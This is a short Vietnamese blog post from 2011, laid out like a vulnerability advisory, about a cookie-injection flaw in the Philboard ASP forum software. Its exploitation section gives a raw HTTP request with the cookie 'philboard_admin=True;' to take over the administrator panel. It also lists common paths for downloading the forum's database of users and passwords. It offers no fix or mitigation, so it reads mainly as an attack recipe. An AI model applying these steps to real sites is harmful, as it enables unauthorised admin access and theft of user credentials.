Thứ Bảy, 16 tháng 4, 2011

Lỗi bảo mật của Philboard Forum, download database


Thông tin:
Severity : High (Đoạt quyền administrator/users ở Forum Board)
Systems Affected: Philboard up to v1.14
Vendor URL: http://www.youngpip.com/philboard.asp
Vuln Type : Cookie Injection
Tóm tắt:
Philboard là một forum freeware dùng script ASP.
Script bị lỗi nằm ở cookie management. Cookie là "philboard_admin=True;" hay "admin=True;"


Khai thác:
1) Login vào Administrator Forum:
Dùng telnet và mở ở port 80

GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;

2) Download database (user và password):
Thông thường, database nằm ở:
http://www.target.com/database/philboard.mdb
hay
http://www.target.com/forum/database/philboard.mdb 

Người đăng: vào lúc

Không có nhận xét nào:

Đăng nhận xét

Đăng ký: Đăng Nhận xét (Atom)